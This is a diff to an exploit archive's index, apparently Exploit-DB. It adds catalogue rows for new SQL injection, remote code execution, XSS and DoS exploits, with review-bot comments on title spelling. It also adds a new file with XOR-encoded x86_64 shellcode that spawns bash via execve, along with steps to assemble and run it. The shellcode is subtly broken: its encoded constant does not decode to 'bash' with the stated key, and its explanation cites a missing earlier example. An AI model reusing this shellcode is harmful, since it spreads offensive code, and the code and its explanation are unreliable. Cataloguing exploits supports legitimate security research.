 4895,exploits/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",webapps,php,,2008-01-10,2016-11-08,1,OSVDB-40336;CVE-2008-0288;OSVDB-40335;OSVDB-40334,,,,http://www.exploit-db.comimagealbum-2.0.0b2.tar.gz,
 42441,exploits/php/webapps/42441.txt,"ImageBay 1.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php,,2017-08-10,2017-08-10,0,,,,,,
 24365,exploits/php/webapps/24365.txt,"ImageCMS 4.0.0b - Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",webapps,php,,2013-01-25,2013-01-25,0,CVE-2012-6290;OSVDB-89513,,,,,https://www.htbridge.com/advisory/HTB23132
+51261,exploits/php/webapps/51261.txt,"ImageMagick 7.1.0-49 - Arbitrary File Read",2023-04-05,"Cristian Giustini",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-44268,,,,,
 41816,exploits/php/webapps/41816.txt,"ImagePro Lazygirls Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",webapps,php,,2017-04-05,2017-04-05,0,,,,,,
 39058,exploits/php/webapps/39058.txt,"Imageview - 'upload.php' Arbitrary File Upload",2014-01-21,"TUNISIAN CYBER",webapps,php,,2014-01-21,2015-12-19,1,OSVDB-102426,,,,,https://www.securityfocus.com/bid/65059/info
 2647,exploits/php/webapps/2647.php,"Imageview 5 - '/Cookie/index.php' Local/Remote File Inclusion",2006-10-25,Kacper,webapps,php,,2006-10-24,,1,OSVDB-30017;CVE-2006-5554,,,,,
@@ -20041,6 +20061,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41195,exploits/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php,,2017-01-30,2017-01-30,0,,,,,,
 42529,exploits/php/webapps/42529.txt,"iTech Social Networking Script 3.08 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php,,2017-08-21,2017-08-21,0,,,,,,
 42657,exploits/php/webapps/42657.txt,"iTech StockPhoto Script 2.02 - SQL Injection",2017-09-11,8bitsec,webapps,php,,2017-09-12,2017-09-12,0,,,,,,
+51253,exploits/php/webapps/51253.txt,"itech TrainSmart r1044 - SQL injection",2023-04-05,"Adrian Bondocea",webapps,php,,2023-04-05,2023-04-05,0,CVE-2021-36520,,,,,
 41023,exploits/php/webapps/41023.txt,"Itech Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",webapps,php,,2017-01-11,2017-02-02,0,,,,,,
 41231,exploits/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php,,2017-02-02,2017-02-02,0,,,,,,
 42511,exploits/php/webapps/42511.txt,"iTech Travel Script 9.49 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-23,0,,,,,,
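Review bot: Row 51253 writes the vendor as lower-case `itech` and the class as `SQL injection`, while every neighbouring row uses `Itech`/`iTech` and `SQL Injection`, so the entry sorts and searches apart from them; `SQL Injection` is the corpus form. More importantly, TrainSmart is, as far as I know, published by I-TECH (the University of Washington's International Training and Education Center for Health), not the "iTech Script" vendor of the surrounding rows, so the lower-case spelling may be an accidental merge of two unrelated vendors — confirm the vendor from the CVE-2021-36520 advisory and spell it as they do (e.g. `I-TECH TrainSmart r1044 - SQL Injection`).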
@@ -24483,6 +24504,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43291,exploits/php/webapps/43291.txt,"Online Exam Test Application Script 1.6 - 'exams.php?sort' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2017-12-13,1,CVE-2017-17622,"SQL Injection (SQLi)",,,,
 48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php,,2020-05-18,2020-05-18,0,,,,,,
 48969,exploits/php/webapps/48969.txt,"Online Examination System 1.0 - 'name' Stored Cross Site Scripting",2020-10-29,"Nikhil Kumar",webapps,php,,2020-10-29,2020-10-29,0,,,,,,
+51246,exploits/php/webapps/51246.txt,"Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)",2023-04-05,"Muhammad Navaid Zafar Ansari",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
 5889,exploits/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,2016-12-09,1,OSVDB-46485;CVE-2008-2890;OSVDB-46484;OSVDB-46483,,,,http://www.exploit-db.comoffl-0.2.6.zip,
 4374,exploits/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,webapps,php,,2007-09-06,2016-10-12,1,OSVDB-36944;CVE-2007-4809;OSVDB-36943,,,,http://www.exploit-db.comoffl-0.2.6.zip,
 48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,,2020-07-15,2020-07-15,0,,,,,,
@@ -25563,6 +25585,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25312,exploits/php/webapps/25312.txt,"PhotoPost Pro 5.1 - 'showphoto.php?photo' SQL Injection",2005-03-28,"Diabolic Crab",webapps,php,,2005-03-28,2013-05-08,1,CVE-2005-0929;OSVDB-15100,,,,,https://www.securityfocus.com/bid/12920/info
 25310,exploits/php/webapps/25310.txt,"PhotoPost Pro 5.1 - 'Slideshow.php?photo' Cross-Site Scripting",2005-03-28,"Diabolic Crab",webapps,php,,2005-03-28,2013-05-08,1,CVE-2005-0928;OSVDB-15098,,,,,https://www.securityfocus.com/bid/12920/info
 6082,exploits/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",webapps,php,,2008-07-14,,1,OSVDB-40193;CVE-2008-7088;CVE-2008-0251,,,,,
+51236,exploits/php/webapps/51236.py,"PhotoShow 3.0 - Remote Code Execution",2023-04-05,"LSCP Responsible Disclosure Lab",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
 29658,exploits/php/webapps/29658.txt,"PhotoStand 1.2 - 'index.php' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php,,2007-02-24,2013-11-18,1,CVE-2007-1101;OSVDB-33773,,,,,https://www.securityfocus.com/bid/22707/info
 8289,exploits/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution",2009-03-26,Osirys,webapps,php,,2009-03-25,,1,,,,,,
 28662,exploits/php/webapps/28662.txt,"Photostore - 'details.php?gid' Cross-Site Scripting",2006-09-25,meto5757,webapps,php,,2006-09-25,2013-10-01,1,CVE-2006-5057;OSVDB-29161,,,,,https://www.securityfocus.com/bid/20172/info
@@ -27912,6 +27935,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info
 35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip,
 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
+51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
 35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip,
 36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip,
 39588,exploits/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",webapps,php,80,2016-03-21,2016-03-21,0,,,,,http://www.exploit-db.comProjectSend-r582.zip,
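Review bot: The description of row 51238, `projectSend r1605 - Remote Code Exectution RCE`, misspells "Execution", drops the parentheses around the abbreviation that every other RCE title in this file uses, and lower-cases the product that the sibling rows spell `ProjectSend`; `ProjectSend r1605 - Remote Code Execution (RCE)` fixes all three. The typo is not cosmetic, because the title field is what searchsploit matches on, so a search for "Remote Code Execution" would never return this entry. The row also has no authentication qualifier and no CVE; if the PoC needs a logged-in user (the older ProjectSend rows are mostly post-auth), `(Authenticated)` should be appended.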
@@ -28420,6 +28444,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43300,exploits/php/webapps/43300.txt,"Responsive Events & Movie Ticket Booking Script 3.2.1 - 'findcity.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17632,,,,,
 49359,exploits/php/webapps/49359.py,"Responsive FileManager 9.13.4 - 'path' Path Traversal",2021-01-05,"Sun* Cyber Security Research Team",webapps,php,,2021-01-05,2021-04-08,0,,,,,,
 45987,exploits/php/webapps/45987.txt,"Responsive FileManager 9.13.4 - Multiple Vulnerabilities",2018-12-14,"Fariskhi Vidyan",webapps,php,,2018-12-14,2018-12-14,0,,,,,http://www.exploit-db.comresponsive_filemanager.zip,
+51251,exploits/php/webapps/51251.py,"Responsive FileManager 9.9.5 - Remote Code Execution (RCE)",2023-04-05,"Galoget Latorre",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-46604,,,,,
 45271,exploits/php/webapps/45271.txt,"Responsive FileManager < 9.13.4 - Directory Traversal",2018-08-27,"Simon Uvarov",webapps,php,80,2018-08-27,2018-08-27,1,CVE-2018-15536;CVE-2018-15535,Traversal,,,http://www.exploit-db.comResponsiveFilemanager-9.13.3.tar.gz,
 41272,exploits/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",webapps,php,,2017-02-07,2017-02-07,1,,,,,http://www.exploit-db.comResponsiveFilemanager-9.11.0.zip,
 41533,exploits/php/webapps/41533.txt,"Responsive Matrimonial Script 4.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php,,2017-03-06,2017-03-06,0,,,,,,
@@ -34219,6 +34244,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 881,exploits/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,webapps,php,,2005-03-14,,1,OSVDB-14803;CVE-2005-0792,,,,,
 996,exploits/php/webapps/996.pl,"ZPanel 2.5b10 - SQL Injection",2005-05-17,RusH,webapps,php,,2005-05-16,,1,,,,,,
 51207,exploits/php/webapps/51207.txt,"Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)",2023-04-03,nu11secur1ty,webapps,php,,2023-04-03,2023-04-03,0,,,,,,
+51240,exploits/php/webapps/51240.txt,"zstore 6.6.0 - Cross-Site Scripting (XSS)",2023-04-05,nu11secur1ty,webapps,php,,2023-04-05,2023-04-05,0,,,,,,
 8567,exploits/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,webapps,php,,2009-04-28,,1,OSVDB-55259,,,,,
 37010,exploits/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Cross-Site Scripting",2012-03-25,Crim3R,webapps,php,,2012-03-25,2015-05-14,1,,,,,,https://www.securityfocus.com/bid/52720/info
 33953,exploits/php/webapps/33953.txt,"Zurmo CRM - Persistent Cross-Site Scripting",2014-07-02,Provensec,webapps,php,80,2014-07-02,2014-07-09,0,OSVDB-108669,,,,http://www.exploit-db.comzurmo-stable-2.6.3.faaf3b4c8596.zip,
@@ -34242,6 +34268,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49370,exploits/python/local/49370.txt,"dirsearch 0.4.1 - CSV Injection",2021-01-06,"Dolev Farhi",local,python,,2021-01-06,2021-01-06,0,,,,,,
 50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",2021-09-13,"Abhiram V",local,python,,2021-09-13,2021-09-13,0,CVE-2021-24040,,,,,
 49342,exploits/python/local/49342.txt,"Knockpy 4.1.1 - CSV Injection",2021-01-04,"Dolev Farhi",local,python,,2021-01-04,2021-01-04,0,,,,,,
+51249,exploits/python/remote/51249.py,"Binwalk v2.3.2 - Remote Command Execution (RCE)",2023-04-05,"Etienne Lacoche",remote,python,,2023-04-05,2023-04-05,0,CVE-2022-4510,,,,,
 40170,exploits/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,remote,python,80,2016-07-27,2016-07-27,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comcentreon-2.5.3.tar.gz,
 41980,exploits/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",remote,python,80,2017-05-09,2017-06-26,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/05bf16e91ec22d94695da5ed643b5cd96f7f4924/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
 41980,exploits/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",remote,python,80,2017-05-09,2017-06-26,1,,Remote,,,,https://github.com/rapid7/metasploit-framework/blob/05bf16e91ec22d94695da5ed643b5cd96f7f4924/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
@@ -38724,6 +38751,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 780,exploits/windows/dos/780.c,"Xpand Rally 1.0.0.0 (Server/Clients) - Crash",2005-01-31,"Luigi Auriemma",dos,windows,28015,2005-01-30,,1,OSVDB-13317;CVE-2005-0325,,,,,
 37299,exploits/windows/dos/37299.py,"XtMediaPlayer 0.93 - '.wav' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",dos,windows,,2015-06-16,2015-06-16,1,OSVDB-123359,,,,http://www.exploit-db.comXtMediaPlayer_0.93_Win.rar,
 11176,exploits/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)",2010-01-17,superli,dos,windows,,2010-01-16,,1,OSVDB-64386,,Xunlei_XPPlayer_ActiveX_Remote_Exec_0day_POC.zip,,http://www.exploit-db.comThunder5.9.14.1246.exe,
+51265,exploits/windows/dos/51265.txt,"XWorm Trojan 2.1 - Null Pointer Derefernce DoS",2023-04-05,"TOUHAMI Kasbaoui",dos,windows,,2023-04-05,2023-04-05,0,,,,,,
 15905,exploits/windows/dos/15905.py,"Xynph FTP Server 1.0 - USER Denial of Service",2011-01-04,freak_out,dos,windows,,2011-01-05,2016-09-27,1,,,,http://www.exploit-db.com/screenshots/idlt16000/15905.png,http://www.exploit-db.comxynph10.zip,
 941,exploits/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service Vulnerabilities",2005-04-14,"Luigi Auriemma",dos,windows,,2005-04-13,,1,OSVDB-15509;CVE-2005-1165;CVE-2005-1164,,,,,
 6072,exploits/windows/dos/6072.html,"Yahoo Messenger 8.1 - ActiveX Remote Denial of Service",2008-07-14,"Jeremy Brown",dos,windows,,2008-07-13,,1,,,,,,
@@ -42854,6 +42882,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16568,exploits/windows/remote/16568.rb,"Juniper SSL-VPN IVE - 'JuniperSetupDLL.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2006-2086;OSVDB-25001,"Metasploit Framework (MSF)",,,,
 17460,exploits/windows/remote/17460.pl,"Kaillera - Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,remote,windows,,2011-06-30,2011-06-30,0,,,,,http://www.exploit-db.comProject64k_0_13.zip,
 28186,exploits/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",remote,windows,,2006-07-06,2013-09-10,1,CVE-2006-3491;OSVDB-27041,,,,,https://www.securityfocus.com/bid/18871/info
+51239,exploits/windows/remote/51239.py,"Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)",2023-04-05,"Patrick Hener",remote,windows,,2023-04-05,2023-04-05,0,CVE-2023-22855,,,,,
 1462,exploits/windows/remote/1462.cpp,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,remote,windows,21,2006-01-30,2016-10-27,1,CVE-2006-0441;OSVDB-22734,,,,,
 1452,exploits/windows/remote/1452.pm,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)",2006-01-25,redsand,remote,windows,21,2006-01-24,2016-10-27,1,CVE-2006-0441;OSVDB-22734,"Metasploit Framework (MSF)",,,,
 1448,exploits/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow",2006-01-25,"Critical Security",remote,windows,,2006-01-24,2016-10-27,1,OSVDB-22734;CVE-2006-0441,,,,,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index d9267f3d8..0a5dc19e4 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -819,6 +819,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",,linux_x86-64,31,2017-03-03,2017-08-24,0,,,,,,
 13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,,linux_x86-64,49,2009-05-13,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-77.php
 47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",,linux_x86-64,168,2019-07-29,2019-08-01,0,,,,,,
+51258,shellcodes/linux_x86-64/51258.txt,"Linux/x86_64 - bash Shellcode with xor encoding",2023-04-05,"Jeenika Anadani",,linux_x86-64,71,2023-04-05,2023-04-05,0,,,,,,
 47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",,linux_x86-64,129,2019-08-19,2019-08-20,0,,,,,,
 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",,linux_x86-64,104,2019-06-10,2019-06-10,0,,,,,,
 46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",,linux_x86-64,131,2019-06-07,2019-06-07,0,,,,,,
diff --git a/shellcodes/linux_x86-64/51258.txt b/shellcodes/linux_x86-64/51258.txt
new file mode 100644
index 000000000..c420395e3
--- /dev/null
+++ b/shellcodes/linux_x86-64/51258.txt
@@ -0,0 +1,68 @@
+Exploit Title: Linux/x86_64 - bash shellcode with xor encoding
+Date: 05/02/2023
+Exploit Author: Jeenika Anadani
+Contact: https://twitter.com/cyber_jeeni
+Category: Shellcode
+Architectue: Linux x86_64
+Shellcode Length: 71 Bytes
+
+-----------------------
+section .data
+
+section .text
+ global _start
+
+_start:
+ ; set up argv and envp arrays for execve()
+ xor rax, rax
+ mov [rsp-8], rax
+ mov qword [rsp-16], 0x72613162 ; encrypted 'bash'
+ xor byte [rsp-16], 0x08
+ xor byte [rsp-15], 0x16
+ xor byte [rsp-14], 0x24
+ xor byte [rsp-13], 0x32
+ lea rdx, [rsp-16]
+ mov qword [rsp-24], rdx
+ mov qword [rsp-32], rdx
+ lea rdi, [rsp-32]
+
+ ; call execve()
+ xor eax, eax
+ mov al, 59
+ syscall
+
+ ; exit with status code 0
+ xor eax, eax
+ mov ebx, eax
+ mov al, 60
+ syscall
+
+-----------
+#### Explanation:
+
+This code uses XOR encryption to obscure the name of the program being executed, `"bash"`. The XOR encryption key is `0x08162432`, which is applied to each byte of the string. The decryption is performed just before calling `execve`, so the program name is passed in its original form.
+
+The rest of the code is the same as the previous example, making a system call to the `execve` function and then calling the `exit` syscall to terminate the process.
+
+---------
+### Compilation AND Execution:
+
+To run the x86_64 assembly code on a Linux system, you need to assemble it into an executable file and then run the file. Here are the steps:
+
+1. Save the code to a file with a `.asm` extension, for example `bash.asm`.
+
+2. Assemble the code into an object file using an assembler, such as NASM:
+ `nasm -f elf64 -o bash.o bash.asm`
+The `-f elf64` option specifies that the output format should be ELF64 (Executable and Linkable Format), and the `-o` option specifies the name of the output file, `bash.o`.
+
+3. Link the object file to produce an executable file using the `ld` linker:
+ `ld -s -o bash bash.o`
+The `-s` option removes the symbol table from the output file to make it smaller, and the `-o` option specifies the name of the output file, `bash`.
+
+4. Make the file executable:
+ `chmod +x bash`
+
+5. Finally, you can run the file:
+ `./bash`
+
+---------------------
\ No newline at end of file